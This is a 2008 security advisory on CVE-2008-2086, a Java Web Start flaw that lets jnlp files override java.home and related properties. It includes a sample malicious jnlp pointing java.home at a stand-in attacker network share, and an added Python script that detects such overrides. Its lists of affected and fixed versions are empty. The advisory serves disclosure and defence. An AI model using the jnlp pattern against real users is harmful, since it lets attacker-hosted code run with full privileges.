Java Web Start File Inclusion via System Properties Override

Release Date 2008-12-03
Application Sun Java Runtime Environment / Java Web Start
Versions See below
Severity High
Author Timothy D. Morgan <tmorgan {a} vsecurity.com>
Vendor Status Patch Released [3]
CVE Candidate CVE-2008-2086
Reference Original Advisory

Product Description

From [1]:

Using Java Web Start technology, standalone Java software applications can be deployed with a single click over the network. Java Web Start ensures the most current version of the application will be deployed, as well as the correct version of the Java Runtime Environment (JRE).

Vulnerability Overview

On March 27th, VSR identified a vulnerability in Java Web Start related to the execution of privileged applications. This flaw could allow an attacker to execute arbitrary code on a victim system if a user could be convinced to visit a malicious web site.

Product Background

Java Web Start (JWS) applications are launched through specially formatted XML files hosted on web sites with a "jnlp" file extension. These files reference one or more "jar" files which are meant to be downloaded and executed by client systems. JWS applications are run in unprivileged mode by default but may be run with full user privileges if the jnlp file requests this access. Privileged JWS applications must have each jar file signed by the same trusted author in order to be executed. However, jnlp files are not signed and may be hosted by third-party web sites.

In addition to specifying application components, the jnlp specification permits application authors to supply certain System properties which may be retrieved by the application through the System.getProperty() and System.getProperties() methods. Besides any user-supplied properties, the Java VM also provides access to a number of sensitive runtime settings through this interface.

More information on the jnlp format may be found in [2].

Vulnerability Details

VSR discovered an unsafe behavior in the way properties are interpreted when specified in jnlp files. In certain versions of the Java Runtime Environment (JRE), values supplied through jnlp files override existing system defaults. Thus far, VSR has verified that the following System properties may be overridden:

  java.home
  java.ext.dirs
  user.home

Of particular interest are the java.home and java.ext.dirs properties. If an attacker could lure a victim to open a malicious jnlp file which references a trusted application, it may be executed without any confirmation by the user. However, as the application attempts to load classes, it may trust the malicious java.home and/or java.ext.dirs value. These paths could point to a malicious local or remote JRE or extensions installation. It appears that under Windows, UNC network paths may be used for the java.home value. It is not yet known whether or not UNC paths may be used for java.ext.dirs.

During testing, VSR found that Java Cryptography Extension (JCE) classes failed to load when java.home was set to an invalid path. However, by setting this path to a network share which hosted a valid JRE installation, the JCE classes loaded correctly. If such a network share were hosted by the attacker, then arbitrary code could potentially be loaded without restrictions, unbeknownst to the victim.

The following XML shows what a malicious jnlp file might look like. Note that the malicious jnlp file would likely be very similar to the ones users normally rely on with certain properties overridden in the resources section.

<jnlp spec="1.0+" codebase="http://trusted.example.org/" href="evil.jnlp">
  <information>
    <title>Trusted Application</title>
    <vendor>Trusted Vendor</vendor>
    <description>Trusted Application by Trusted Vendor</description>
    <homepage href="http://trusted.example.org/" />
    <offline-allowed />
  </information>
  <security><all-permissions /></security>
  <resources>
    <j2se version="1.5+" />
    <!-- Next line overrides the JRE's java.home System property -->
    <property name="java.home" value="\\evil.example.com\jre" />
    <jar href="signed-and-trusted-jce-dependent-library.jar" />
  </resources>
  <application-desc main-class="org.example.trusted.app.StartApp" />
</jnlp>
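The following Python script is an added triage example, not code from the advisory or from Sun. It parses a jnlp document, checks whether it requests all-permissions, and reports any property element that overrides one of the three System properties the advisory names (java.home, java.ext.dirs, user.home), noting when the value is a UNC or URL path that would cause classes to be fetched from a remote host. The embedded sample jnlp is constructed here to mirror the one above; the hostnames, the app.theme property and the function names are assumptions, not part of the original.

```python
"""Triage helper: flag jnlp files that override sensitive JVM System properties.

Added example (not part of the VSR advisory or Sun's code). Intended for
scanning cached or proxied jnlp files so that a defender can spot the
pattern described in the advisory before a user launches the application.
"""
import xml.etree.ElementTree as ET

# Properties the advisory reports as overridable through a jnlp file.
SENSITIVE_PROPERTIES = {"java.home", "java.ext.dirs", "user.home"}

# Constructed sample modelled on the advisory's illustrative jnlp.
# Hostnames and the app.theme property are placeholders, not real data.
SAMPLE_JNLP = r"""<jnlp spec="1.0+" codebase="http://trusted.example.org/" href="evil.jnlp">
  <information>
    <title>Trusted Application</title>
    <vendor>Trusted Vendor</vendor>
  </information>
  <security><all-permissions /></security>
  <resources>
    <j2se version="1.5+" />
    <property name="java.home" value="\\evil.example.com\jre" />
    <property name="app.theme" value="dark" />
    <jar href="signed-and-trusted-jce-dependent-library.jar" />
  </resources>
  <application-desc main-class="org.example.trusted.app.StartApp" />
</jnlp>
"""


def is_remote_path(value):
    """True when a path value is a UNC share (two leading backslashes or
    slashes) or a URL, i.e. a location that is not on the local disk."""
    v = value.strip()
    return v.startswith("\\\\") or v.startswith("//") or "://" in v


def analyze_jnlp(xml_text):
    """Return a list of findings for sensitive property overrides.

    Each finding is a tuple (property name, value, sorted list of reasons).
    Reasons are short tags: 'overrides-<name>', 'all-permissions' when the
    file asks for full privileges, and 'remote-path' when the value points
    off the local machine.
    """
    root = ET.fromstring(xml_text)
    if root.tag != "jnlp":
        raise ValueError("root element is %r, not <jnlp>" % root.tag)

    # A privileged application is the case the advisory is concerned with.
    all_permissions = root.find("./security/all-permissions") is not None

    findings = []
    for prop in root.iter("property"):
        name = prop.get("name", "")
        value = prop.get("value", "")
        if name not in SENSITIVE_PROPERTIES:
            continue
        reasons = ["overrides-" + name]
        if all_permissions:
            reasons.append("all-permissions")
        if is_remote_path(value):
            reasons.append("remote-path")
        findings.append((name, value, sorted(reasons)))
    return findings


def risk_level(findings):
    """Collapse findings to one label.

    'high'   : a privileged (all-permissions) app would load from a remote path,
               the exact scenario in the advisory.
    'medium' : a sensitive property is overridden but one of those two
               conditions is missing.
    'none'   : nothing suspicious.
    """
    if not findings:
        return "none"
    for _name, _value, reasons in findings:
        if "all-permissions" in reasons and "remote-path" in reasons:
            return "high"
    return "medium"


if __name__ == "__main__":
    results = analyze_jnlp(SAMPLE_JNLP)
    for name, value, reasons in results:
        print("%s = %r  [%s]" % (name, value, ", ".join(reasons)))
    print("risk:", risk_level(results))
```

Run against a directory of downloaded jnlp files, anything rated high is worth blocking at the proxy until the JRE on the client has been updated; a medium rating on user.home alone is the application-specific variant the advisory mentions and needs a look at how the application uses that property.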

To fully exploit this specific attack vector, an attacker would need to remotely or locally host a malicious version of classes used by a trusted application and then lure a user into opening a malicious jnlp file. A firewall installed between the attacker and victim could mitigate this issue if the victim's machine were restricted from accessing the hosted network share.

Note that certain JWS applications may trust other System properties, such as user.home, and use them in ways which could be exploited in application-specific variants of this attack.

Versions Affected

During testing, VSR found the following JRE versions to be vulnerable:

Version 1.6.0_05 on Windows did not appear to be vulnerable. However, Sun recommends that any installations with the following versions be updated:

Sun reports that JRE 1.3.x is not affected, nor is JRE 6 Update 7 for Intel Itanium. For more information on versions affected and updates, see [3].

Vendor Response

The following timeline details Sun's response to the reported issue:

2008-03-28 Sun was provided a draft advisory.
2008-03-28 An initial response was received from Sun.
2008-04-11 Sun reported that the issue could not be reproduced.
2008-04-11 VSR provided Sun additional exploit details.
2008-04-29 Sun reported the issue was reproduced and assigned an internal issue tracking number of CR 6694892.
2008-12-03 Sun Alert 244988 was released with an associated security update.

Sun Alert 244988 may be obtained at:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-244988-1

Recommendation

Apply the JRE update as soon as possible. The issue is fixed in:

Review Sun Alert 244988 [3] for information on how to temporarily disable Java Web Start to work around this issue.

Common Vulnerabilities and Exposures (CVE) Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2008-2086 to this issue. This is a candidate for inclusion in the CVE list, which standardizes names for security problems.

Acknowledgements

Thanks to George Gal for assistance in testing. VSR would like to thank Sun for cooperating in the patch development process.


References

1. Java Web Start Technology
http://java.sun.com/products/javawebstart/
2. Java Web Start Architecture JNLP Specification & API Documentation
http://java.sun.com/products/javawebstart/download-spec.html
3. Sun Alert 244988
http://sunsolve.sun.com/search/document.do?assetkey=1-66-244988-1

Copyright © 2008 Virtual Security Research, LLC. All rights reserved.